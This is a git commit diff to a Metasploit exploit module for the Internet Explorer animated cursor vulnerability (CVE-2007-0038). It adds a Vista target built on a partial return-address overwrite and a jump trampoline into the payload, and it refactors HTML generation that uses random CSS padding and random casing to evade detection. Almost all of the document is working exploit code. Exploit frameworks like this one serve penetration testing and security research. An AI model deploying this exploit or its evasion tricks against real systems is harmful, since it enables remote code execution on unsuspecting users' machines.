fixes for Vista, brute forcing

git-svn-id: file:///home/svn/framework3/trunk@4598 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Matt Miller 2007-04-01 20:33:35 +00:00
parent 86f4bfd514
commit 6cfab21bcb
1 changed files with 48 additions and 37 deletions

View File

@ -96,18 +96,20 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
#
# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start
# of the RIFF itself.
# of the RIFF chunk itself. The length field of the RIFF chunk
# tag contains a short jump into an embedded riff chunk that
# makes a long relative jump into the actual payload.
#
[ 'Windows Vista user32.dll 6.0.6000.16386',
{
'Ret' => 0x700b,
'Len' => 2,
# The RIFF magic bytes and the size of the riff file are
# executed which then bounce through.
#
# 1. Partial overwrite return with the address of a jmp dword [ebx]
# 2. Executes the first few bytes of the RIFF chunk and then
# does a jmp $+0x16
# 3. Executes a relative jump to the start of the payload
# itself.
[ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2 } ]
# On Vista, the pages that contain the RIFF are read-only.
# In-place decoders cannot be used.
'EncoderType' => Msf::Encoder::Type::Raw
}
]
],
'DisclosureDate' => 'Mar 28 2007',
@ -145,28 +147,14 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
mytargs = (target.name =~ /All Targets/) ? targets : [target]
mytargs.each_index do |i|
if target.name =~ /All Targets/
targets.each_index { |i|
next if not targets[i].ret
next if not mytargs[i].ret
html << "<div style='" +
generate_css_padding() +
Rex::Text.to_rand_case("cursor") +
generate_css_padding() +
":" +
generate_css_padding() +
Rex::Text.to_rand_case("url(") +
generate_css_padding() +
'"' +
get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" +
"?#{rand_text_alpha(rand(12)+1)}=#{i}" +
'"' +
generate_css_padding() +
");" +
generate_css_padding() +
"'>" +
generate_padding() +
"</div>"
html << generate_div(gext, i)
}
else
html << generate_div(gext, target_index)
end
html << "</body></html>"
@ -191,6 +179,27 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
handler(cli)
end
def generate_div(gext, targ)
"<div style='" +
generate_css_padding() +
Rex::Text.to_rand_case("cursor") +
generate_css_padding() +
":" +
generate_css_padding() +
Rex::Text.to_rand_case("url(") +
generate_css_padding() +
'"' +
get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" +
"?#{rand_text_alpha(rand(12)+1)}=#{targ}" +
'"' +
generate_css_padding() +
");" +
generate_css_padding() +
"'>" +
generate_padding() +
"</div>"
end
def generate_ani(payload, target)
# Build the first ANI header
@ -208,10 +217,10 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
if (target.name =~ /Vista/)
# Vista has ebp=80, eip=84
anih_b = anih_a + rand_text(84-anih_a.length)
anih_b = rand_text(84)
# Overwrite locals with invalid pointers
anih_b[68, 12] = [0x80000000 | rand(0xffffffff)].pack('V') * 3
# Overwrite local counter variable and pointers
anih_b[68, 12] = [0].pack('V') * 3
else
# XP/2K has ebp=76 and eip=80
anih_b = anih_a + rand_text(80-anih_a.length)
@ -226,6 +235,8 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
# Begin the ANI chunk
riff = "ACON"
# Calculate the data offset for the trampoline chunk and add
# the trampoline chunk if we're attacking Vista
if target.name =~ /Vista/
trampoline_doffset = riff.length + 8